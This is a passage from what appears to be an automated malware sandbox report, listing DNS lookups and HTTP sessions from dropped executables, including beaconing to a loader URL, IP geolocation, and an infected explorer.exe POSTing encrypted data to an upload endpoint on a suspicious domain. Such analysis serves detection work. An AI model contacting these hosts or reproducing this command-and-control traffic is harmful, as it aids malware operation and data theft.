                                      Aug 21, 2024 11:00:10.744560003 CEST192.168.2.41.1.1.10xbc40Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:15.744064093 CEST192.168.2.41.1.1.10xef6fStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:20.743937969 CEST192.168.2.41.1.1.10x159cStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:25.743568897 CEST192.168.2.41.1.1.10x477fStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:30.744314909 CEST192.168.2.41.1.1.10xbc38Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:30.805304050 CEST192.168.2.41.1.1.10xbc38Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:35.753916025 CEST192.168.2.41.1.1.10xdc20Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:40.743437052 CEST192.168.2.41.1.1.10xf362Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:45.744724989 CEST192.168.2.41.1.1.10xbb5aStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:50.743674040 CEST192.168.2.41.1.1.10x3451Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:55.743526936 CEST192.168.2.41.1.1.10xaa36Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:00.752156019 CEST192.168.2.41.1.1.10x828cStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.512377024 CEST192.168.2.41.1.1.10x7e16Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:05.743944883 CEST192.168.2.41.1.1.10xc0b9Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:05.830436945 CEST192.168.2.41.1.1.10xc0b9Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:11.384921074 CEST192.168.2.41.1.1.10x1468Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:15.744168997 CEST192.168.2.41.1.1.10xb945Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Aug 21, 2024 10:57:04.754440069 CEST1.1.1.1192.168.2.40x64ffName error (3)hsiens.xyznonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.052150965 CEST1.1.1.1192.168.2.40xbf8fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.057504892 CEST1.1.1.1192.168.2.40x70e6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.057504892 CEST1.1.1.1192.168.2.40x70e6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.057504892 CEST1.1.1.1192.168.2.40x70e6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.057504892 CEST1.1.1.1192.168.2.40x70e6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.057504892 CEST1.1.1.1192.168.2.40x70e6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.690707922 CEST1.1.1.1192.168.2.40x6aceName error (3)topniemannpickshop.ccnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.839729071 CEST1.1.1.1192.168.2.40xbd73Name error (3)niemannbest.menonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.988709927 CEST1.1.1.1192.168.2.40x9622Name error (3)all-mobile-pa1ments.com.mxnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:14.031333923 CEST1.1.1.1192.168.2.40x83ebName error (3)buy-fantasy-football.com.sgnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:14.155388117 CEST1.1.1.1192.168.2.40xcb2No error (0)iplogger.org172.67.132.113A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:14.155388117 CEST1.1.1.1192.168.2.40xcb2No error (0)iplogger.org104.21.4.208A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:15.763009071 CEST1.1.1.1192.168.2.40xb156Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:21.063889980 CEST1.1.1.1192.168.2.40x947fName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:23.016902924 CEST1.1.1.1192.168.2.40x2dc9Name error (3)ggg-cl.biznonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:25.803114891 CEST1.1.1.1192.168.2.40x6db2Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:28.462510109 CEST1.1.1.1192.168.2.40x3f5No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:28.462510109 CEST1.1.1.1192.168.2.40x3f5No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:28.462510109 CEST1.1.1.1192.168.2.40x3f5No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:29.891536951 CEST1.1.1.1192.168.2.40xd325No error (0)wfsdragon.ru172.67.133.215A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:29.891536951 CEST1.1.1.1192.168.2.40xd325No error (0)wfsdragon.ru104.21.5.208A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:30.803325891 CEST1.1.1.1192.168.2.40x7d7cName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:35.752973080 CEST1.1.1.1192.168.2.40xd1fbName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:40.775892019 CEST1.1.1.1192.168.2.40x7744Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:45.776489973 CEST1.1.1.1192.168.2.40xcf29Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:49.609154940 CEST1.1.1.1192.168.2.40x1b57No error (0)gmpeople.com188.40.141.211A (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:50.758833885 CEST1.1.1.1192.168.2.40xc351Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:55.753973961 CEST1.1.1.1192.168.2.40xca43Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:01.064625978 CEST1.1.1.1192.168.2.40xc9f2Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:05.754246950 CEST1.1.1.1192.168.2.40x59edName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:10.777149916 CEST1.1.1.1192.168.2.40x4f54Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:15.756114960 CEST1.1.1.1192.168.2.40x36a2Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:20.770121098 CEST1.1.1.1192.168.2.40x9b2eName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:25.768310070 CEST1.1.1.1192.168.2.40x97c7Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:30.754036903 CEST1.1.1.1192.168.2.40xb6afName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:36.959250927 CEST1.1.1.1192.168.2.40x98a0Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:36.971368074 CEST1.1.1.1192.168.2.40x98a0Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:41.157186985 CEST1.1.1.1192.168.2.40xe2fbName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:45.900995970 CEST1.1.1.1192.168.2.40x12d3Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:50.754959106 CEST1.1.1.1192.168.2.40xe701Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:55.780023098 CEST1.1.1.1192.168.2.40x1405Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:00.753262997 CEST1.1.1.1192.168.2.40xa53dName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:05.752636909 CEST1.1.1.1192.168.2.40x1271Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:10.778723001 CEST1.1.1.1192.168.2.40x1fc4Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:15.920403957 CEST1.1.1.1192.168.2.40x1e1eName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:20.757042885 CEST1.1.1.1192.168.2.40x3497Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:25.915009975 CEST1.1.1.1192.168.2.40xcfe6Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:31.029889107 CEST1.1.1.1192.168.2.40x5e0aName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:35.751316071 CEST1.1.1.1192.168.2.40x6fbaName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:40.753799915 CEST1.1.1.1192.168.2.40xb888Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:45.774305105 CEST1.1.1.1192.168.2.40x9414Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:50.756500959 CEST1.1.1.1192.168.2.40xa557Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:55.751503944 CEST1.1.1.1192.168.2.40x6917Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:00.754420042 CEST1.1.1.1192.168.2.40xa030Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:05.751183033 CEST1.1.1.1192.168.2.40xc42dName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:10.756506920 CEST1.1.1.1192.168.2.40xbc40Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:15.752898932 CEST1.1.1.1192.168.2.40xef6fName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:20.751422882 CEST1.1.1.1192.168.2.40x159cName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:25.751151085 CEST1.1.1.1192.168.2.40x477fName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:31.242646933 CEST1.1.1.1192.168.2.40xbc38Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:31.242655039 CEST1.1.1.1192.168.2.40xbc38Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:35.764540911 CEST1.1.1.1192.168.2.40xdc20Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:40.752430916 CEST1.1.1.1192.168.2.40xf362Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:45.754983902 CEST1.1.1.1192.168.2.40xbb5aName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:50.752052069 CEST1.1.1.1192.168.2.40x3451Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:55.751274109 CEST1.1.1.1192.168.2.40xaa36Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:00.759634972 CEST1.1.1.1192.168.2.40x828cName error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.519846916 CEST1.1.1.1192.168.2.40x7e16No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.519846916 CEST1.1.1.1192.168.2.40x7e16No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.519846916 CEST1.1.1.1192.168.2.40x7e16No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.519846916 CEST1.1.1.1192.168.2.40x7e16No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:03.519846916 CEST1.1.1.1192.168.2.40x7e16No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:05.904736042 CEST1.1.1.1192.168.2.40xc0b9Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:05.905031919 CEST1.1.1.1192.168.2.40xc0b9Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:11.398274899 CEST1.1.1.1192.168.2.40x1468Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:01:15.752178907 CEST1.1.1.1192.168.2.40xb945Name error (3)t.gogamec.comnonenoneA (IP address)IN (0x0001)false
                                      • cdn.discordapp.com
                                      • iplogger.org
                                      • pastebin.com
                                      • 45.133.1.107
                                      • ip-api.com
                                      • wfsdragon.ru
                                      • 51.178.186.149
                                      • 45.9.20.13
                                      • gmpeople.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973445.133.1.107807996C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:06.867872953 CEST200OUTGET /server.txt HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: 45.133.1.107


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449735208.95.112.1807940C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:10.062691927 CEST498OUTGET /json/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                      viewport-width: 1920
                                      Host: ip-api.com
                                      Aug 21, 2024 10:57:10.529217958 CEST482INHTTP/1.1 200 OK
                                      Date: Wed, 21 Aug 2024 08:57:10 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 305
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.459965172.67.133.215807996C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:29.903273106 CEST206OUTGET /api/setStats.php HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: wfsdragon.ru
                                      Aug 21, 2024 10:57:30.610217094 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:30 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMPZcVCLz7oUqPNw7shSOIByM9YE04cLZllZ7sOIyjnJq1H77lEDrCi9cQyWRmoqLpZoMuybl87M7Dn2MGKrqEdVk99EemzmpSS6LpICv0PAFi50r7UA4Pwk6TGeeoo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8b696a7c7f237cab-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 34 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 [TRUNCATED]
                                      Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8b696a7c7f237cab',t:'MTcyNDIzMDY1MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement(
                                      Aug 21, 2024 10:57:30.610367060 CEST491INData Raw: 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c
                                      Data Ascii: 'iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)docum


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.45996751.178.186.149807996C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:30.643382072 CEST215OUTGET /base/api/statistics.php HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                                      Host: 51.178.186.149


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.45996845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:31.423799038 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.459977188.40.141.211802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:49.617980957 CEST279OUTPOST /upload/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gmpeople.com/upload/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 341
                                      Host: gmpeople.com
                                      Aug 21, 2024 10:57:49.618021965 CEST341OUTData Raw: 39 6e 51 11 82 bb 69 22 df d9 b0 03 0e 02 0e ca 0e 7e cc 90 6b 04 94 62 0e 7f 78 e1 45 b7 b1 1e 9a 59 ce 21 02 68 51 19 e7 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1f 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 17 ac 84
                                      Data Ascii: 9nQi"~kbxEY!hQ? 9Yt M@NA .[k,vuCtOL|7[8w|OCG$XQ/9BWdN"^6Y_E?K'A0Pb3*`y^]_,VT"
                                      Aug 21, 2024 10:57:50.304039955 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 7
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Data Raw: 03 00 00 00 70 e8 c6
                                      Data Ascii: p
                                      Aug 21, 2024 10:57:50.318002939 CEST279OUTPOST /upload/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gmpeople.com/upload/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 187
                                      Host: gmpeople.com
                                      Aug 21, 2024 10:57:50.318109035 CEST187OUTData Raw: 39 6e 51 11 82 bb 69 22 df d9 b0 03 0e 02 0e ca 0e 7e cc 90 6b 04 94 62 0e 7f 78 e1 45 b7 b1 1e 9a 59 ce 21 02 68 51 19 e7 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1f 1d c7 41 20 ff 2d 5b 78 6b 2c 90 f5 76 0b 75 67 25 ac 8b
                                      Data Ascii: 9nQi"~kbxEY!hQ? 9Yt M@NA -[xk,vug%UW@kzmDD'OygJH&vdf$'Lk.[_P1B5|UOPHq3
                                      Aug 21, 2024 10:57:50.751966000 CEST144INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 0
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Aug 21, 2024 10:57:50.877175093 CEST144INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Content-Length: 0
                                      Content-Type: application/octet-stream
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.45998045.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:52.790793896 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.45999545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:14.184186935 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.46000245.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:26.223206043 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
